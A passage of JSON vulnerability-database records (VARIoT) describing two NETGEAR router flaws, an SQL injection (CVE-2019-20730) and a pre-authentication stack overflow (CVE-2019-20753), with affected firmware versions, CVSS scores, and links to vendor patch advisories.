"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:d3600_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6220_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6400_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d7000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d7800_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d8500_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:dc112a_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015431"
}
]
},
"cve": "CVE-2019-20730",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2019-20730",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2019-015431",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2019-20730",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "cve@mitre.org",
"availabilityImpact": "NONE",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2019-20730",
"impactScore": 4.2,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2019-015431",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-20730",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "cve@mitre.org",
"id": "CVE-2019-20730",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2019-015431",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-1341",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015431"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1341"
},
{
"db": "NVD",
"id": "CVE-2019-20730"
},
{
"db": "NVD",
"id": "CVE-2019-20730"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by SQL injection. This affects D3600 before 1.0.0.68, D6000 before 1.0.0.68, D6200 before 1.1.00.28, D6220 before 1.0.0.40, D6400 before 1.0.0.74, D7000 before 1.0.1.60, D7000v2 before 1.0.0.74, D7800 before 1.0.1.34, D8500 before 1.0.3.39, DC112A before 1.0.0.40, EX8000 before 1.0.0.118, JR6150 before 1.0.1.18, R6050 before 1.0.1.18, R6220 before 1.1.0.66, R6250 before 1.0.4.26, R6300v2 before 1.0.4.24, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.44, R6700v2 before 1.2.0.16, R6800 before 1.2.0.16, R6900v2 before 1.2.0.16, R6900 before 1.0.1.44, R7000 before 1.0.9.26, R6900P before 1.3.0.20, R7000P before 1.3.0.20, R7100LG before 1.0.0.40, R7300DST before 1.0.0.62, R7500 before 1.0.0.118, R7500v2 before 1.0.3.26, R7800 before 1.0.2.40, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.116, R8500 before 1.0.2.116, R8900 before 1.0.3.6, R9000 before 1.0.3.10, WNDR3700v4 before 1.0.2.102, WNDR3700v5 before 1.1.0.54, WNDR4300v1 before 1.0.2.98, WNDR4300v2 before 1.0.0.56, and WNDR4500v3 before 1.0.0.56. plural NETGEAR On the device SQL An injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-20730"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015431"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-20730",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015431",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1341",
"trust": 0.6
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015431"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1341"
},
{
"db": "NVD",
"id": "CVE-2019-20730"
}
]
},
"id": "VAR-202004-0802",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.396501476060606
},
"last_update_date": "2024-11-23T23:04:25.701000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for SQL Injection on Some Routers, Gateways, and Extenders, PSV-2017-3056",
"trust": 0.8,
"url": "https://kb.netgear.com/000061197/Security-Advisory-for-SQL-Injection-on-Some-Routers-Gateways-and-Extenders-PSV-2017-3056"
},
{
"title": "Multiple NETGEAR product SQL Repair measures for injecting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=116891"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015431"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1341"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-89",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015431"
},
{
"db": "NVD",
"id": "CVE-2019-20730"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "https://kb.netgear.com/000061197/security-advisory-for-sql-injection-on-some-routers-gateways-and-extenders-psv-2017-3056"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20730"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-20730"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015431"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1341"
},
{
"db": "NVD",
"id": "CVE-2019-20730"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015431"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1341"
},
{
"db": "NVD",
"id": "CVE-2019-20730"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-05-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-015431"
},
{
"date": "2020-04-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1341"
},
{
"date": "2020-04-16T20:15:13.337000",
"db": "NVD",
"id": "CVE-2019-20730"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-05-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-015431"
},
{
"date": "2020-04-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1341"
},
{
"date": "2024-11-21T04:39:12.447000",
"db": "NVD",
"id": "CVE-2019-20730"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1341"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR On the device SQL Injection vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015431"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1341"
}
],
"trust": 0.6
}
}
var-202004-0799
Vulnerability from variot
Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects DGN2200v1 before 1.0.0.58, D8500 before 1.0.3.42, D7000v2 before 1.0.0.51, D6400 before 1.0.0.78, D6220 before 1.0.0.44, JNDR3000 before 1.0.0.24, R8000 before 1.0.4.18, R8500 before 1.0.2.122, R8300 before 1.0.2.122, R7900 before 1.0.2.16, R7000P before 1.3.2.34, R7300DST before 1.0.0.68, R7100LG before 1.0.0.46, R6900P before 1.3.2.34, R7000 before 1.0.9.28, R6900 before 1.0.1.46, R6700 before 1.0.1.46, R6400v2 before 1.0.2.56, R6400 before 1.0.1.42, R6300v2 before 1.0.4.28, R6250 before 1.0.4.26, WNDR3400v3 before 1.0.1.22, WNDR4500v2 before 1.0.0.72, and WNR3500Lv2 before 1.2.0.50. plural NETGEAR The device is vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR D8500, etc. are all wireless routers from NETGEAR. The vulnerability stems from the fact that when the network system or product performs operations on the memory, the data boundary is not correctly verified, resulting in incorrect read and write operations to other associated memory locations. Attackers can use this vulnerability to cause buffer overflow or heap overflow
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-0799",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "d8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.42"
},
{
"model": "r6250",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.26"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.46"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.46"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.9.28"
},
{
"model": "r7100lg",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.46"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.18"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.122"
},
{
"model": "r8300",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.122"
},
{
"model": "r7300dst",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.68"
},
{
"model": "d6220",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.44"
},
{
"model": "d6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.78"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.16"
},
{
"model": "jndr3000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.24"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.42"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.2.34"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.2.34"
},
{
"model": "d7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.51"
},
{
"model": "wnr3500l",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.50"
},
{
"model": "wndr4500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.72"
},
{
"model": "dgn2200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.28"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.56"
},
{
"model": "wndr3400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "d6220",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.44"
},
{
"model": "d6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.78"
},
{
"model": "d7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.51"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.46"
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "jndr3000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.24"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.2.16"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.4.18"
},
{
"model": "r8300",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.2.122"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.2.122"
},
{
"model": "r6300v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.4.28"
},
{
"model": "d7000v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.51"
},
{
"model": "wndr3400v3",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "dgn2200v1",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "r6400v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.2.56"
},
{
"model": "wndr4500v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.72"
},
{
"model": "wnr3500lv2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.2.0.50"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-61060"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015458"
},
{
"db": "NVD",
"id": "CVE-2019-20753"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:d6220_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6400_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d7000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d8500_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:dgn2200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:jndr3000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7900_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r8000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r8300_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r8500_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015458"
}
]
},
"cve": "CVE-2019-20753",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"id": "CVE-2019-20753",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Adjacent Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2019-015458",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"id": "CNVD-2021-61060",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2019-20753",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "cve@mitre.org",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2019-20753",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2019-015458",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-20753",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "cve@mitre.org",
"id": "CVE-2019-20753",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2019-015458",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2021-61060",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-1364",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-61060"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015458"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1364"
},
{
"db": "NVD",
"id": "CVE-2019-20753"
},
{
"db": "NVD",
"id": "CVE-2019-20753"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects DGN2200v1 before 1.0.0.58, D8500 before 1.0.3.42, D7000v2 before 1.0.0.51, D6400 before 1.0.0.78, D6220 before 1.0.0.44, JNDR3000 before 1.0.0.24, R8000 before 1.0.4.18, R8500 before 1.0.2.122, R8300 before 1.0.2.122, R7900 before 1.0.2.16, R7000P before 1.3.2.34, R7300DST before 1.0.0.68, R7100LG before 1.0.0.46, R6900P before 1.3.2.34, R7000 before 1.0.9.28, R6900 before 1.0.1.46, R6700 before 1.0.1.46, R6400v2 before 1.0.2.56, R6400 before 1.0.1.42, R6300v2 before 1.0.4.28, R6250 before 1.0.4.26, WNDR3400v3 before 1.0.1.22, WNDR4500v2 before 1.0.0.72, and WNR3500Lv2 before 1.2.0.50. plural NETGEAR The device is vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR D8500, etc. are all wireless routers from NETGEAR. The vulnerability stems from the fact that when the network system or product performs operations on the memory, the data boundary is not correctly verified, resulting in incorrect read and write operations to other associated memory locations. Attackers can use this vulnerability to cause buffer overflow or heap overflow",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-20753"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015458"
},
{
"db": "CNVD",
"id": "CNVD-2021-61060"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-20753",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015458",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2021-61060",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1364",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-61060"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015458"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1364"
},
{
"db": "NVD",
"id": "CVE-2019-20753"
}
]
},
"id": "VAR-202004-0799",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-61060"
}
],
"trust": 1.1075530365384614
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-61060"
}
]
},
"last_update_date": "2024-11-23T22:29:39.991000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Pre-Authentication Stack Overflow on Some Routers and Modem Routers, PSV-2018-0085",
"trust": 0.8,
"url": "https://kb.netgear.com/000060629/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-and-Modem-Routers-PSV-2018-0085"
},
{
